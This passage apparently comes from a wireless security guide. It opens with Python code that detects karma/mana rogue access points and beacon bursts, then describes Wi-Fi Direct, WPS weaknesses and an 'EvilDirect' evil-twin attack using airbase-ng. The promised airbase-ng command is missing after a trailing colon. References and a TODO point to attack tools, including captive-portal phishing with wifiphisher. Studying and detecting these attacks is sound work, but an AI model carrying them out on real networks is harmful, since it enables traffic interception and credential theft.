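def detect_rogue_aps(frames, max_ssids=2, window=1.0, burst_ssids=3):
    """Return {bssid: [indicator, ...]}.
    karma/mana: one transmitter answers probe requests for more than max_ssids
    distinct SSIDs (a real AP answers only for the networks it serves).
    beacon-burst: one transmitter beacons burst_ssids or more distinct SSIDs
    inside `window` seconds. Thresholds are illustrative; tune per site."""
    resp_ssids = defaultdict(set)
    beacons = defaultdict(list)            # bssid -> [(time, ssid)]
    for t, kind, src, ssid in frames:
        if kind == "probe_resp":
            resp_ssids[src].add(ssid)
        elif kind == "beacon":
            beacons[src].append((t, ssid))
    alerts = defaultdict(list)
    for bssid, ssids in resp_ssids.items():
        if len(ssids) > max_ssids:
            alerts[bssid].append(f"karma/mana: probe responses for {len(ssids)} SSIDs")
    for bssid, events in beacons.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            seen = {s for t, s in events[i:] if t - t0 <= window}
            if len(seen) >= burst_ssids:
                alerts[bssid].append(f"beacon-burst: {len(seen)} SSIDs in {window}s")
                break
    return dict(alerts)
```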
Wi-Fi Direct
Wi-Fi Direct is a protocol that allows devices to link directly to each other using Wi-Fi without the need for a traditional access point. This capability is built into various Internet of Things (IoT) devices, such as printers and televisions, facilitating direct device-to-device communication. A notable feature of Wi-Fi Direct is that one device takes on the role of access point, known as the group owner, to manage the connection.
Security for Wi-Fi Direct connections is established through Wi-Fi Protected Setup (WPS), which supports several methods of secure pairing, including:
- Push-Button Configuration (PBC)
- PIN entry
- Near-Field Communication (NFC)
These methods, particularly PIN entry, are susceptible to the same vulnerabilities as WPS in traditional Wi-Fi networks, making them targets for similar attack vectors.
EvilDirect Hijacking
EvilDirect Hijacking is an attack specific to Wi-Fi Direct. It mirrors the concept of an Evil Twin attack but targets Wi-Fi Direct connections. In this scenario, an attacker impersonates a legitimate group owner with the aim of deceiving devices into connecting to a malicious entity. This method can be executed using tools like airbase-ng by specifying the channel, ESSID, and MAC address of the device being impersonated:
References
- https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
- https://posts.specterops.io/modern-wireless-attacks-pt-ii-mana-and-known-beacon-attacks-97a359d385f9
- https://posts.specterops.io/modern-wireless-tradecraft-pt-iii-management-frame-access-control-lists-mfacls-22ca7f314a38
- https://posts.specterops.io/modern-wireless-tradecraft-pt-iv-tradecraft-and-detection-d1a95da4bb4d
- https://github.com/gdssecurity/Whitepapers/blob/master/GDS%20Labs%20-%20Identifying%20Rogue%20Access%20Point%20Attacks%20Using%20Probe%20Response%20Patterns%20and%20Signal%20Strength.pdf
- http://solstice.sh/wireless/eaphammer/2019/09/10/eap-downgrade-attacks/
- https://www.evilsocket.net/2019/02/13/Pwning-WiFi-networks-with-bettercap-and-the-PMKID-client-less-attack/
- https://medium.com/hacking-info-sec/ataque-clientless-a-wpa-wpa2-usando-pmkid-1147d72f464d
- https://forums.kali.org/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack)
- The vulnerability that killed FreeWifi_Secure
- RFC 4186 – EAP-SIM Authentication
- 3GPP TS 33.402 – 3GPP system architecture evolution (SAE); Security aspects of non-3GPP accesses
- Wireless-(in)Fidelity: Pentesting Wi-Fi in 2025 (Synacktiv)
- PEAP relay attacks with wpa_sycophant (SensePost)
TODO: Check https://github.com/wifiphisher/wifiphisher (Facebook login and WPA imitation in captive portals)